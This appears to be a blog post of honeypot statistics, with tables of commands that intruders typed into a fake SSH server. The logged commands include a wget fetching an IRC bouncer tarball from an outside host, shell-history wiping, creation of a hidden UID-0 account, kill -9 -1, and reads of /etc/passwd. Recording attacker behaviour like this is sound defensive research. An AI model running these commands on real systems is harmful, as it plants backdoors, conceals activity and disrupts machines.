Kippo Statistics

For 7 months I ran a kippo [1] SSH honeypot on the VPS I use for security research. I used kippo-graph [2] to generate these nice graphics from my kippo database. Below you can find some interesting statistics.

To be on the safe side, I unfortunately had to remove the 'executed wget commands' section, as most of the entries contained links to malware.

[Charts generated by kippo-graph (images not reproduced here): top 10 passwords; connections per IP (pie and bar chart); logins from the same IP; most probes per day; most successful logins per day; probes per day; probes per week; success ratio; successes per day; successes per week; top 10 username/password combinations (pie and bar chart); top 10 SSH clients; top 10 usernames]

Input presentation and statistics gathered from the honeypot system

Overall post-compromise activity

Post-compromise human activity
Total number of commands: 430
Distinct number of commands: 184

Downloaded files
Total number of downloads: 24
Distinct number of downloads: 22

Human activity inside the honeypot

The following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of input to the system.

The following line chart visualizes real human activity per day, by counting the number of input to the system for each day of operation.

Warning: Dates with zero input are not displayed.

The following line chart visualizes real human activity per week, by counting the number of input to the system for each week of operation.



Top 10 input (overall)

The following table displays the top 10 commands (overall) entered by attackers in the honeypot system.

ID  Input                                   Count
1   w                                       44
2   ls                                      23
3   echo "WinSCP: this is end-of-file:0"    20
4   uname -a                                16
5   exit                                    16
6   cat /proc/cpuinfo                       15
7   ps x                                    10
8   ls -a                                   10
9   cat /etc/issue                          10
10  wget                                    9

This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.



Top 10 successful input

The following table displays the top 10 successful commands entered by attackers in the honeypot system.

ID  Input (success)                         Count
1   w                                       44
2   ls                                      23
3   echo "WinSCP: this is end-of-file:0"    20
4   uname -a                                16
5   exit                                    16
6   cat /proc/cpuinfo                       15
7   ps x                                    10
8   ls -a                                   10
9   cat /etc/issue                          10
10  wget                                    9

This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.



Top 10 failed input

The following table displays the top 10 failed commands entered by attackers in the honeypot system (attacker typos such as "unaem" are reproduced as typed).

ID  Input (fail)                                                                              Count
1   perl                                                                                      9
2   make                                                                                      3
3   perl -v                                                                                   3
4   {                                                                                         3
5   }                                                                                         3
6   gcc                                                                                       2
7   unaem -a                                                                                  2
8   ./au                                                                                      1
9   14ddoszone.altervista.org sbnc.tgz                                                        1
10  14ddoszone.altervista.org sbnc.tgzwget http://www.freewebs.com/gbl-net/psyBNC.tar.gz     1

This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.



passwd commands

The following table displays the latest "passwd" commands entered by attackers in the honeypot system (the Input column is the new password the attacker typed at the passwd prompt).

ID  Timestamp                          Input
1   Wednesday, 21-Aug-2013, 16:54 PM   bucea123
2   Tuesday, 02-Apr-2013, 18:27 PM     hansol123
3   Friday, 08-Feb-2013, 13:27 PM      tudorioan1911

Executed scripts

The following table displays the latest scripts executed by attackers in the honeypot system.

ID  Timestamp                          Input
1   Tuesday, 23-Jul-2013, 16:59 PM     ./a 59.188
2   Friday, 19-Jul-2013, 17:29 PM      ./bash
3   Wednesday, 19-Jun-2013, 09:15 AM   ./ss
4   Friday, 07-Jun-2013, 15:15 PM      ./go
5   Tuesday, 30-Apr-2013, 16:10 PM     ./
6   Wednesday, 27-Mar-2013, 00:50 AM   ./setup 123456 9
7   Friday, 22-Mar-2013, 07:18 AM      ./k-i686
8   Saturday, 02-Feb-2013, 16:24 PM    ./autorun
9   Saturday, 02-Feb-2013, 16:24 PM    ./au

Interesting commands

The following table displays other interesting commands executed by attackers in the honeypot system (typos such as "memoinfo" and "/proc./cpuinfo" are the attackers' own).

ID  Timestamp                          Input
1   Friday, 09-Aug-2013, 22:02 PM      cat /proc/memoinfo
2   Friday, 02-Aug-2013, 11:41 AM      cat /pcat /proc/cpuinfo
3   Friday, 02-Aug-2013, 11:41 AM      cat /proc/meminfo
4   Tuesday, 23-Jul-2013, 21:28 PM     adduser test
5   Tuesday, 23-Jul-2013, 21:28 PM     cat /etc/passwd
6   Friday, 19-Jul-2013, 17:24 PM      cat /etc/hosts
7   Monday, 20-May-2013, 17:46 PM      cat messages
8   Monday, 20-May-2013, 17:46 PM      cat m
9   Tuesday, 14-May-2013, 04:09 AM     ssh -v
10  Tuesday, 02-Apr-2013, 18:26 PM     adduser pici
11  Sunday, 31-Mar-2013, 17:11 PM      strings /usr/sbin/sshd | grep %s:%s -A2 -B2
12  Sunday, 31-Mar-2013, 17:11 PM      unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
13  Sunday, 31-Mar-2013, 17:11 PM      export HISTFILE=/dev/null
14  Wednesday, 27-Mar-2013, 00:52 AM   kill -9 -1
15  Wednesday, 27-Mar-2013, 00:50 AM   cd .sshd
16  Wednesday, 27-Mar-2013, 00:50 AM   cd /dev/shm
17  Wednesday, 27-Mar-2013, 00:49 AM   cat /etc/issue
18  Thursday, 21-Feb-2013, 06:38 AM    ifconfig
19  Friday, 08-Feb-2013, 13:27 PM      /usr/sbin/useradd -o -u 0 bonzo
20  Friday, 08-Feb-2013, 13:27 PM      cat /proc./cpuinfo
21  Thursday, 07-Feb-2013, 09:04 AM    echo "WinSCP: this is end-of-file:0"
22  Thursday, 07-Feb-2013, 09:03 AM    cat /proc/cpuinfo

apt-get commands

The following table displays the latest "apt-get"/"aptitude" commands entered by attackers in the honeypot system.

ID  Timestamp                          Input
1   Monday, 20-May-2013, 17:49 PM      apt-get install apt dpkg aptitude
2   Monday, 20-May-2013, 17:49 PM      apt-get install vi
3   Monday, 20-May-2013, 17:44 PM      apt-get install find
4   Sunday, 31-Mar-2013, 17:12 PM      apt-get install perl

[1] https://code.google.com/p/kippo/
[2] http://bruteforce.gr/kippo-graph